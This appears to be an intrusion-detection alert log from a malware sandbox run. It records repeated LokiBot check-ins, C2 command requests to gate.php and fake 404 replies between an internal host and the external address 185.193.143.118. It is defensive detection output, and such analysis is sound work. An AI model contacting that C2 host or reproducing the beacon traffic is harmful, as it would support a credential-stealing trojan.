12/21/20-08:33:41.221610	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49186	80	192.168.2.22	185.193.143.118
12/21/20-08:33:41.221610	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49186	80	192.168.2.22	185.193.143.118
12/21/20-08:33:41.413666	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49186	185.193.143.118	192.168.2.22
12/21/20-08:33:41.708348	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49187	80	192.168.2.22	185.193.143.118
12/21/20-08:33:41.708348	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49187	80	192.168.2.22	185.193.143.118
12/21/20-08:33:41.708348	TCP	2025381	ET TROJAN LokiBot Checkin	49187	80	192.168.2.22	185.193.143.118
12/21/20-08:33:41.708348	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49187	80	192.168.2.22	185.193.143.118
12/21/20-08:33:41.708348	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49187	80	192.168.2.22	185.193.143.118
12/21/20-08:33:41.895755	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49187	185.193.143.118	192.168.2.22
12/21/20-08:33:42.188874	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49188	80	192.168.2.22	185.193.143.118
12/21/20-08:33:42.188874	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49188	80	192.168.2.22	185.193.143.118
12/21/20-08:33:42.188874	TCP	2025381	ET TROJAN LokiBot Checkin	49188	80	192.168.2.22	185.193.143.118
12/21/20-08:33:42.188874	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49188	80	192.168.2.22	185.193.143.118
12/21/20-08:33:42.188874	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49188	80	192.168.2.22	185.193.143.118
12/21/20-08:33:42.381173	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49188	185.193.143.118	192.168.2.22
12/21/20-08:33:42.666408	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49189	80	192.168.2.22	185.193.143.118
12/21/20-08:33:42.666408	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49189	80	192.168.2.22	185.193.143.118
12/21/20-08:33:42.666408	TCP	2025381	ET TROJAN LokiBot Checkin	49189	80	192.168.2.22	185.193.143.118
12/21/20-08:33:42.666408	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49189	80	192.168.2.22	185.193.143.118
12/21/20-08:33:42.666408	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49189	80	192.168.2.22	185.193.143.118
12/21/20-08:33:42.848619	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49189	185.193.143.118	192.168.2.22
12/21/20-08:33:43.123722	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49190	80	192.168.2.22	185.193.143.118
12/21/20-08:33:43.123722	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49190	80	192.168.2.22	185.193.143.118
12/21/20-08:33:43.123722	TCP	2025381	ET TROJAN LokiBot Checkin	49190	80	192.168.2.22	185.193.143.118
12/21/20-08:33:43.123722	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49190	80	192.168.2.22	185.193.143.118
12/21/20-08:33:43.123722	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49190	80	192.168.2.22	185.193.143.118
12/21/20-08:33:43.317317	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49190	185.193.143.118	192.168.2.22
12/21/20-08:33:43.611075	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49191	80	192.168.2.22	185.193.143.118
12/21/20-08:33:43.611075	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49191	80	192.168.2.22	185.193.143.118
12/21/20-08:33:43.611075	TCP	2025381	ET TROJAN LokiBot Checkin	49191	80	192.168.2.22	185.193.143.118
12/21/20-08:33:43.611075	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49191	80	192.168.2.22	185.193.143.118
12/21/20-08:33:43.611075	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49191	80	192.168.2.22	185.193.143.118
12/21/20-08:33:43.801180	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49191	185.193.143.118	192.168.2.22
12/21/20-08:33:44.096731	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49192	80	192.168.2.22	185.193.143.118
12/21/20-08:33:44.096731	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49192	80	192.168.2.22	185.193.143.118
12/21/20-08:33:44.096731	TCP	2025381	ET TROJAN LokiBot Checkin	49192	80	192.168.2.22	185.193.143.118
12/21/20-08:33:44.096731	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49192	80	192.168.2.22	185.193.143.118
12/21/20-08:33:44.096731	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49192	80	192.168.2.22	185.193.143.118
12/21/20-08:33:44.293749	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49192	185.193.143.118	192.168.2.22
12/21/20-08:33:44.571159	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49193	80	192.168.2.22	185.193.143.118
12/21/20-08:33:44.571159	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49193	80	192.168.2.22	185.193.143.118
12/21/20-08:33:44.571159	TCP	2025381	ET TROJAN LokiBot Checkin	49193	80	192.168.2.22	185.193.143.118
12/21/20-08:33:44.571159	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49193	80	192.168.2.22	185.193.143.118
12/21/20-08:33:44.571159	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49193	80	192.168.2.22	185.193.143.118
12/21/20-08:33:44.761158	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49193	185.193.143.118	192.168.2.22
12/21/20-08:33:45.056071	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49194	80	192.168.2.22	185.193.143.118
12/21/20-08:33:45.056071	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49194	80	192.168.2.22	185.193.143.118
12/21/20-08:33:45.056071	TCP	2025381	ET TROJAN LokiBot Checkin	49194	80	192.168.2.22	185.193.143.118
12/21/20-08:33:45.056071	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49194	80	192.168.2.22	185.193.143.118
12/21/20-08:33:45.056071	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49194	80	192.168.2.22	185.193.143.118
12/21/20-08:33:45.256387	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49194	185.193.143.118	192.168.2.22
12/21/20-08:33:45.531713	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49195	80	192.168.2.22	185.193.143.118
12/21/20-08:33:45.531713	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49195	80	192.168.2.22	185.193.143.118
12/21/20-08:33:45.531713	TCP	2025381	ET TROJAN LokiBot Checkin	49195	80	192.168.2.22	185.193.143.118
12/21/20-08:33:45.531713	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49195	80	192.168.2.22	185.193.143.118
12/21/20-08:33:45.531713	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49195	80	192.168.2.22	185.193.143.118
12/21/20-08:33:45.724094	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49195	185.193.143.118	192.168.2.22
12/21/20-08:33:46.000245	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49196	80	192.168.2.22	185.193.143.118
12/21/20-08:33:46.000245	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49196	80	192.168.2.22	185.193.143.118
12/21/20-08:33:46.000245	TCP	2025381	ET TROJAN LokiBot Checkin	49196	80	192.168.2.22	185.193.143.118
12/21/20-08:33:46.000245	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49196	80	192.168.2.22	185.193.143.118
12/21/20-08:33:46.000245	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49196	80	192.168.2.22	185.193.143.118
12/21/20-08:33:46.197208	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49196	185.193.143.118	192.168.2.22
12/21/20-08:33:46.505912	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49197	80	192.168.2.22	185.193.143.118
12/21/20-08:33:46.505912	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49197	80	192.168.2.22	185.193.143.118
12/21/20-08:33:46.505912	TCP	2025381	ET TROJAN LokiBot Checkin	49197	80	192.168.2.22	185.193.143.118
12/21/20-08:33:46.505912	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49197	80	192.168.2.22	185.193.143.118
12/21/20-08:33:46.505912	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49197	80	192.168.2.22	185.193.143.118
12/21/20-08:33:46.689478	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49197	185.193.143.118	192.168.2.22
12/21/20-08:33:46.952497	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49198	80	192.168.2.22	185.193.143.118
12/21/20-08:33:46.952497	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49198	80	192.168.2.22	185.193.143.118
12/21/20-08:33:46.952497	TCP	2025381	ET TROJAN LokiBot Checkin	49198	80	192.168.2.22	185.193.143.118
12/21/20-08:33:46.952497	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49198	80	192.168.2.22	185.193.143.118
12/21/20-08:33:46.952497	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49198	80	192.168.2.22	185.193.143.118
12/21/20-08:33:47.145210	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49198	185.193.143.118	192.168.2.22
12/21/20-08:33:47.436852	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49199	80	192.168.2.22	185.193.143.118
12/21/20-08:33:47.436852	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49199	80	192.168.2.22	185.193.143.118
12/21/20-08:33:47.436852	TCP	2025381	ET TROJAN LokiBot Checkin	49199	80	192.168.2.22	185.193.143.118
12/21/20-08:33:47.436852	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49199	80	192.168.2.22	185.193.143.118
12/21/20-08:33:47.436852	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49199	80	192.168.2.22	185.193.143.118
12/21/20-08:33:47.628328	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49199	185.193.143.118	192.168.2.22
12/21/20-08:33:47.907513	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49200	80	192.168.2.22	185.193.143.118
12/21/20-08:33:47.907513	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49200	80	192.168.2.22	185.193.143.118
12/21/20-08:33:47.907513	TCP	2025381	ET TROJAN LokiBot Checkin	49200	80	192.168.2.22	185.193.143.118
12/21/20-08:33:47.907513	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49200	80	192.168.2.22	185.193.143.118
12/21/20-08:33:47.907513	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49200	80	192.168.2.22	185.193.143.118
12/21/20-08:33:48.102721	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49200	185.193.143.118	192.168.2.22
12/21/20-08:33:48.399306	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49201	80	192.168.2.22	185.193.143.118
12/21/20-08:33:48.399306	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49201	80	192.168.2.22	185.193.143.118
12/21/20-08:33:48.399306	TCP	2025381	ET TROJAN LokiBot Checkin	49201	80	192.168.2.22	185.193.143.118
12/21/20-08:33:48.399306	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49201	80	192.168.2.22	185.193.143.118
12/21/20-08:33:48.399306	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49201	80	192.168.2.22	185.193.143.118
12/21/20-08:33:48.594541	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49201	185.193.143.118	192.168.2.22
12/21/20-08:33:48.868225	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49202	80	192.168.2.22	185.193.143.118
12/21/20-08:33:48.868225	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49202	80	192.168.2.22	185.193.143.118
12/21/20-08:33:48.868225	TCP	2025381	ET TROJAN LokiBot Checkin	49202	80	192.168.2.22	185.193.143.118
12/21/20-08:33:48.868225	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49202	80	192.168.2.22	185.193.143.118
12/21/20-08:33:48.868225	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49202	80	192.168.2.22	185.193.143.118
12/21/20-08:33:49.054698	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49202	185.193.143.118	192.168.2.22
12/21/20-08:33:49.345744	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49203	80	192.168.2.22	185.193.143.118
12/21/20-08:33:49.345744	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49203	80	192.168.2.22	185.193.143.118
12/21/20-08:33:49.345744	TCP	2025381	ET TROJAN LokiBot Checkin	49203	80	192.168.2.22	185.193.143.118
12/21/20-08:33:49.345744	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49203	80	192.168.2.22	185.193.143.118
12/21/20-08:33:49.345744	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49203	80	192.168.2.22	185.193.143.118
12/21/20-08:33:49.538415	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49203	185.193.143.118	192.168.2.22
12/21/20-08:33:49.842369	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49204	80	192.168.2.22	185.193.143.118
12/21/20-08:33:49.842369	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49204	80	192.168.2.22	185.193.143.118
12/21/20-08:33:49.842369	TCP	2025381	ET TROJAN LokiBot Checkin	49204	80	192.168.2.22	185.193.143.118
12/21/20-08:33:49.842369	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49204	80	192.168.2.22	185.193.143.118
12/21/20-08:33:49.842369	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49204	80	192.168.2.22	185.193.143.118
12/21/20-08:33:50.024386	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49204	185.193.143.118	192.168.2.22
12/21/20-08:33:50.305218	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49205	80	192.168.2.22	185.193.143.118
12/21/20-08:33:50.305218	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49205	80	192.168.2.22	185.193.143.118
12/21/20-08:33:50.305218	TCP	2025381	ET TROJAN LokiBot Checkin	49205	80	192.168.2.22	185.193.143.118
12/21/20-08:33:50.305218	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49205	80	192.168.2.22	185.193.143.118
12/21/20-08:33:50.305218	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49205	80	192.168.2.22	185.193.143.118
12/21/20-08:33:50.502685	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49205	185.193.143.118	192.168.2.22
12/21/20-08:33:50.800059	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49206	80	192.168.2.22	185.193.143.118
12/21/20-08:33:50.800059	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49206	80	192.168.2.22	185.193.143.118
12/21/20-08:33:50.800059	TCP	2025381	ET TROJAN LokiBot Checkin	49206	80	192.168.2.22	185.193.143.118
12/21/20-08:33:50.800059	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49206	80	192.168.2.22	185.193.143.118
12/21/20-08:33:50.800059	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49206	80	192.168.2.22	185.193.143.118
12/21/20-08:33:50.995314	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49206	185.193.143.118	192.168.2.22
12/21/20-08:33:51.266644	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49207	80	192.168.2.22	185.193.143.118
12/21/20-08:33:51.266644	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49207	80	192.168.2.22	185.193.143.118
12/21/20-08:33:51.266644	TCP	2025381	ET TROJAN LokiBot Checkin	49207	80	192.168.2.22	185.193.143.118
12/21/20-08:33:51.266644	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49207	80	192.168.2.22	185.193.143.118
12/21/20-08:33:51.266644	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49207	80	192.168.2.22	185.193.143.118
12/21/20-08:33:51.461716	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49207	185.193.143.118	192.168.2.22
12/21/20-08:33:51.729572	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49208	80	192.168.2.22	185.193.143.118
12/21/20-08:33:51.729572	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49208	80	192.168.2.22	185.193.143.118
12/21/20-08:33:51.729572	TCP	2025381	ET TROJAN LokiBot Checkin	49208	80	192.168.2.22	185.193.143.118
12/21/20-08:33:51.729572	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49208	80	192.168.2.22	185.193.143.118
12/21/20-08:33:51.729572	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49208	80	192.168.2.22	185.193.143.118
12/21/20-08:33:51.917481	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49208	185.193.143.118	192.168.2.22
12/21/20-08:33:52.201845	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49209	80	192.168.2.22	185.193.143.118
12/21/20-08:33:52.201845	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49209	80	192.168.2.22	185.193.143.118
12/21/20-08:33:52.201845	TCP	2025381	ET TROJAN LokiBot Checkin	49209	80	192.168.2.22	185.193.143.118
12/21/20-08:33:52.201845	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49209	80	192.168.2.22	185.193.143.118
12/21/20-08:33:52.201845	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49209	80	192.168.2.22	185.193.143.118
12/21/20-08:33:52.382859	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49209	185.193.143.118	192.168.2.22
12/21/20-08:33:52.681831	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49210	80	192.168.2.22	185.193.143.118
12/21/20-08:33:52.681831	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49210	80	192.168.2.22	185.193.143.118
12/21/20-08:33:52.681831	TCP	2025381	ET TROJAN LokiBot Checkin	49210	80	192.168.2.22	185.193.143.118
12/21/20-08:33:52.681831	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49210	80	192.168.2.22	185.193.143.118
12/21/20-08:33:52.681831	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49210	80	192.168.2.22	185.193.143.118
12/21/20-08:33:52.881215	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49210	185.193.143.118	192.168.2.22
12/21/20-08:33:53.154706	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49211	80	192.168.2.22	185.193.143.118
12/21/20-08:33:53.154706	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49211	80	192.168.2.22	185.193.143.118
12/21/20-08:33:53.154706	TCP	2025381	ET TROJAN LokiBot Checkin	49211	80	192.168.2.22	185.193.143.118
12/21/20-08:33:53.154706	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49211	80	192.168.2.22	185.193.143.118
12/21/20-08:33:53.154706	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49211	80	192.168.2.22	185.193.143.118
12/21/20-08:33:53.346194	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49211	185.193.143.118	192.168.2.22
12/21/20-08:33:53.619537	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49212	80	192.168.2.22	185.193.143.118
12/21/20-08:33:53.619537	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49212	80	192.168.2.22	185.193.143.118
12/21/20-08:33:53.619537	TCP	2025381	ET TROJAN LokiBot Checkin	49212	80	192.168.2.22	185.193.143.118
12/21/20-08:33:53.619537	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49212	80	192.168.2.22	185.193.143.118
12/21/20-08:33:53.619537	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49212	80	192.168.2.22	185.193.143.118
12/21/20-08:33:53.817549	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49212	185.193.143.118	192.168.2.22
12/21/20-08:33:54.095934	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49213	80	192.168.2.22	185.193.143.118
12/21/20-08:33:54.095934	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49213	80	192.168.2.22	185.193.143.118
12/21/20-08:33:54.095934	TCP	2025381	ET TROJAN LokiBot Checkin	49213	80	192.168.2.22	185.193.143.118
12/21/20-08:33:54.095934	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49213	80	192.168.2.22	185.193.143.118
12/21/20-08:33:54.095934	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49213	80	192.168.2.22	185.193.143.118
12/21/20-08:33:54.282756	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49213	185.193.143.118	192.168.2.22
12/21/20-08:33:54.563018	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49214	80	192.168.2.22	185.193.143.118
12/21/20-08:33:54.563018	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49214	80	192.168.2.22	185.193.143.118
12/21/20-08:33:54.563018	TCP	2025381	ET TROJAN LokiBot Checkin	49214	80	192.168.2.22	185.193.143.118
12/21/20-08:33:54.563018	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49214	80	192.168.2.22	185.193.143.118
12/21/20-08:33:54.563018	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49214	80	192.168.2.22	185.193.143.118
12/21/20-08:33:54.753853	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49214	185.193.143.118	192.168.2.22
12/21/20-08:33:55.018163	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49215	80	192.168.2.22	185.193.143.118
12/21/20-08:33:55.018163	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49215	80	192.168.2.22	185.193.143.118
12/21/20-08:33:55.018163	TCP	2025381	ET TROJAN LokiBot Checkin	49215	80	192.168.2.22	185.193.143.118
12/21/20-08:33:55.018163	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49215	80	192.168.2.22	185.193.143.118
12/21/20-08:33:55.018163	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49215	80	192.168.2.22	185.193.143.118
12/21/20-08:33:55.203334	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49215	185.193.143.118	192.168.2.22
12/21/20-08:33:55.468060	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49216	80	192.168.2.22	185.193.143.118
12/21/20-08:33:55.468060	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49216	80	192.168.2.22	185.193.143.118
12/21/20-08:33:55.468060	TCP	2025381	ET TROJAN LokiBot Checkin	49216	80	192.168.2.22	185.193.143.118
12/21/20-08:33:55.468060	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49216	80	192.168.2.22	185.193.143.118
12/21/20-08:33:55.468060	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49216	80	192.168.2.22	185.193.143.118
12/21/20-08:33:57.629525	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49216	185.193.143.118	192.168.2.22
12/21/20-08:33:58.210023	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49217	80	192.168.2.22	185.193.143.118
12/21/20-08:33:58.210023	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49217	80	192.168.2.22	185.193.143.118
12/21/20-08:33:58.210023	TCP	2025381	ET TROJAN LokiBot Checkin	49217	80	192.168.2.22	185.193.143.118
12/21/20-08:33:58.210023	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49217	80	192.168.2.22	185.193.143.118
12/21/20-08:33:58.210023	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49217	80	192.168.2.22	185.193.143.118
12/21/20-08:33:58.403531	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49217	185.193.143.118	192.168.2.22
12/21/20-08:33:58.669352	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49218	80	192.168.2.22	185.193.143.118
12/21/20-08:33:58.669352	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49218	80	192.168.2.22	185.193.143.118
12/21/20-08:33:58.669352	TCP	2025381	ET TROJAN LokiBot Checkin	49218	80	192.168.2.22	185.193.143.118
12/21/20-08:33:58.669352	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49218	80	192.168.2.22	185.193.143.118
12/21/20-08:33:58.669352	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49218	80	192.168.2.22	185.193.143.118
12/21/20-08:33:58.864827	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49218	185.193.143.118	192.168.2.22
12/21/20-08:33:59.144565	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49219	80	192.168.2.22	185.193.143.118
12/21/20-08:33:59.144565	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49219	80	192.168.2.22	185.193.143.118
12/21/20-08:33:59.144565	TCP	2025381	ET TROJAN LokiBot Checkin	49219	80	192.168.2.22	185.193.143.118
12/21/20-08:33:59.144565	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49219	80	192.168.2.22	185.193.143.118
12/21/20-08:33:59.144565	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49219	80	192.168.2.22	185.193.143.118
12/21/20-08:33:59.334280	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49219	185.193.143.118	192.168.2.22
12/21/20-08:33:59.604248	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49220	80	192.168.2.22	185.193.143.118
12/21/20-08:33:59.604248	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49220	80	192.168.2.22	185.193.143.118
12/21/20-08:33:59.604248	TCP	2025381	ET TROJAN LokiBot Checkin	49220	80	192.168.2.22	185.193.143.118
12/21/20-08:33:59.604248	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49220	80	192.168.2.22	185.193.143.118
12/21/20-08:33:59.604248	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49220	80	192.168.2.22	185.193.143.118
12/21/20-08:33:59.791795	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49220	185.193.143.118	192.168.2.22
12/21/20-08:34:00.066546	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49221	80	192.168.2.22	185.193.143.118
12/21/20-08:34:00.066546	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49221	80	192.168.2.22	185.193.143.118
12/21/20-08:34:00.066546	TCP	2025381	ET TROJAN LokiBot Checkin	49221	80	192.168.2.22	185.193.143.118
12/21/20-08:34:00.066546	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49221	80	192.168.2.22	185.193.143.118
12/21/20-08:34:00.066546	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49221	80	192.168.2.22	185.193.143.118
12/21/20-08:34:00.256095	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49221	185.193.143.118	192.168.2.22
12/21/20-08:34:00.524930	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49222	80	192.168.2.22	185.193.143.118
12/21/20-08:34:00.524930	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49222	80	192.168.2.22	185.193.143.118
12/21/20-08:34:00.524930	TCP	2025381	ET TROJAN LokiBot Checkin	49222	80	192.168.2.22	185.193.143.118
12/21/20-08:34:00.524930	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49222	80	192.168.2.22	185.193.143.118
12/21/20-08:34:00.524930	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49222	80	192.168.2.22	185.193.143.118
